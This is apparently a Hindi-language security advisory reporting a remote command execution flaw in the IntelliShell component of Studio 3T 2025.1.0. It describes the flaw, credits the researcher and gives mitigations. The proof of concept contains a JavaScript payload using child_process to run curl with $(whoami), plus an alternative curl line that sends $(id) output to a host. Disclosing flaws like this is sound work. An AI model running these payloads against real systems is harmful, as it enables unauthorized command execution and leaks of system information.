
Studio 3T v.2025.1.0
सॉफ़्टवेयर: Studio 3T v.2025.1.0
भेद्यता रिपोर्ट: Studio 3T रिमोट कमांड निष्पादन
अवलोकन Studio 3T संस्करण 2025.1.0 और उससे पहले के संस्करणों में एक गंभीर भेद्यता एक दूरस्थ हमलावर को IntelliShell घटक में child_process मॉड्यूल का शोषण करने वाले एक क्राफ्टेड पेलोड के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
विवरण भेद्यता प्रकार: रिमोट कमांड निष्पादन प्रभावित उत्पाद: Studio 3T, संस्करण <= 2025.1.0 प्रभावित घटक: IntelliShell हमले का प्रकार: रिमोट प्रभाव: कोड निष्पादन: हाँ सेवा से वंचित करना: हाँ विशेषाधिकार वृद्धि: हाँ
वर्णन यह भेद्यता एक दूरस्थ हमलावर को child_process मॉड्यूल का लाभ उठाते हुए IntelliShell के माध्यम से एक दुर्भावनापूर्ण JavaScript पेलोड भेजकर मनमाना ऑपरेटिंग सिस्टम कमांड निष्पादित करने में सक्षम बनाती है। यह एक ब्लाइंड निष्पादन भेद्यता है, जिसका अर्थ है कि हमलावर को कोई सीधा आउटपुट वापस नहीं मिलता है।
हमले का वेक्टर
MongoDB इंस्टेंस से कनेक्शन स्थापित करें। child_process मॉड्यूल का उपयोग करने वाले एक दुर्भावनापूर्ण JavaScript पेलोड को IntelliShell के माध्यम से भेजें ताकि मनमाना ऑपरेटिंग सिस्टम कमांड निष्पादित किए जा सकें।
प्रूफ ऑफ कॉन्सेप्ट भेद्यता की पुष्टि करने के लिए, निम्नलिखित चरणों का उपयोग करें:
एक स्थानीय HTTP सर्वर सेट करें:python3 -m http.server 80
IntelliShell में निम्नलिखित JavaScript पेलोड निष्पादित करें: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));
वैकल्पिक रूप से, सत्यापन वेक्टर के रूप में नीचे दिए गए कमांड का उपयोग करें:curl http://site/$(id)
संदर्भ
Studio 3T आधिकारिक वेबसाइट
Studio 3T GitHub रिपॉजिटरी
CWE-78: OS कमांड इंजेक्शन
CWE-94: कोड इंजेक्शन
शमन उपयोगकर्ता: Studio 3T के पैच किए गए संस्करण में अपग्रेड करें (यदि उपलब्ध हो) या अविश्वसनीय MongoDB कनेक्शन के साथ IntelliShell का उपयोग करने से बचें। विक्रेता: अनधिकृत कमांड निष्पादन को रोकने के लिए IntelliShell में child_process मॉड्यूल के इनपुट को प्रतिबंधित या स्वच्छ करें।
आभार यह भेद्यता कैयो मेंडोंका पेरेरा द्वारा खोजी और रिपोर्ट की गई थी।